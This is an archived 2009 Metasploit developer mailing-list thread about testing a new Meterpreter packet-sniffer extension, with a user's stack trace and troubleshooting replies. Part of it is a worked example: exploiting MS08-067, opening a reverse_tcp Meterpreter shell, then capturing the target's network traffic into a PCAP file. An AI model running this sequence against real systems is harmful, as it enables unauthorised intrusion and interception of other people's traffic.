Metasploit mailing list archives

Meterpreter Sniffer module

From: xyberpix at xyberpix.com (xyberpix)
Date: Sat, 11 Jul 2009 16:26:50 +0100

Nah, was running it locally on OS X, and the target was a Windows XP  
SP0 host, but that was running in Fusion, would that make a  
difference? All other 'sploits work fine though?

xyberpix

On 11 Jul 2009, at 16:23, Carlos Perez wrote:

where you running it on a vm in fusion? there are some steps that  
have to be taken in fusin to let a VM sniff, the same with ESX and  
ESXi just in case

On Sat, Jul 11, 2009 at 10:51 AM, xyberpix <xyberpix at xyberpix.com>  
wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey HD,

Just did a quick test, and it barfed on me, dunno though whether  
this is the code, or my setup. Running on OS X 10.5.7, with Mac Port  
installed.

meterpreter > use sniffer
Loading extension sniffer...[-]
failure: No response was received to the core_loadlib request. / 
Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ 
client_core.rb:157:in `use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/ 
command_dispatcher/core.rb:266:in `cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/ 
command_dispatcher/core.rb:254:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/ 
command_dispatcher/core.rb:254:in `cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
234:in `send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
234:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/ 
console.rb:94:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
196:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
191:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
191:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/ 
console.rb:60:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `call'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `run'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/ 
console.rb:58:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/base/sessions/meterpreter.rb: 
181:in `_interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/interactive.rb:48:in  
`interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/ui/console/ 
command_dispatcher/core.rb:997:in `cmd_sessions'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
234:in `send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
234:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
196:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
191:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
191:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
meterpreter >


xyberpix


On 11 Jul 2009, at 15:38, HD Moore wrote:

I committed a test version of the sniffer extension to the SVN  
trunk. The module in SVN is compiled with debug support, so you  
should see lots of verbose debug prints if you attach a debugger to  
the process where meterpreter is running. I could use some help  
testing this new extension; so far it looks like there are some  
cases where the "use sniffer" command fails (exploiting ms03-026 on  
win2003 sp0), but there may be others as well.


To obtain the latest version of Metasploit on UNIX platforms:
 $ svn co https://metasploit.com/svn/framework3/trunk/

To obtain the latest version of Metasploit on Windows:
 1. Download https://metasploit.com/framework-3.3-dev.exe
 2. Execute this and extract the framework to a directory
 3. Inside the extracted directory execute msfupdate.bat
 4. Inside the extracted directory execute msfconsole.bat

This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we  
have a license), it can sniff packets from the target system without  
writing to the filesystem or installing any drivers. The module  
automatically excludes its own control traffic from the packet  
capture. As of this week, all Meterpeter communication is now  
protected by TLS/SSL, including the packet sniffer data.

To get started with the new module:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/ 
reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216  
bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 ->  
192.168.0.120:1687)

meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > help
[snip]
Sniffer Commands
================

  Command             Description
  -------             -----------
  sniffer_dump        Retrieve captured packet data
  sniffer_interfaces  List all remote sniffable interfaces
  sniffer_start       Capture packets on a previously opened interface
  sniffer_stats       View statistics of an active capture
  sniffer_stop        Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514  
usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap

The sniffer_dump command will append to an existing PCAP or create a  
new one.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAkpYptUACgkQ0IPlrIA4qxpfUwCaAiLcu+nmcRSH3CT1wkHtdxE3
YzoAn3WFO5UJTcrejiIsoPswYTadzigN
=beiw
-----END PGP SIGNATURE-----

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090711/b6a31d20/attachment.htm>

Current thread:

Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
  - Meterpreter Sniffer module HD Moore (Jul 11)
    - Meterpreter Sniffer module xyberpix (Jul 11)
    - Meterpreter Sniffer module HD Moore (Jul 11)
  - Meterpreter Sniffer module Carlos Perez (Jul 11)
    - Meterpreter Sniffer module xyberpix (Jul 11)
  - Meterpreter Sniffer module Carlos Perez (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
  - Meterpreter Sniffer module xyberpix (Jul 12)
  - Meterpreter Sniffer module jep (Jul 13)
    - Meterpreter Sniffer module HD Moore (Jul 13)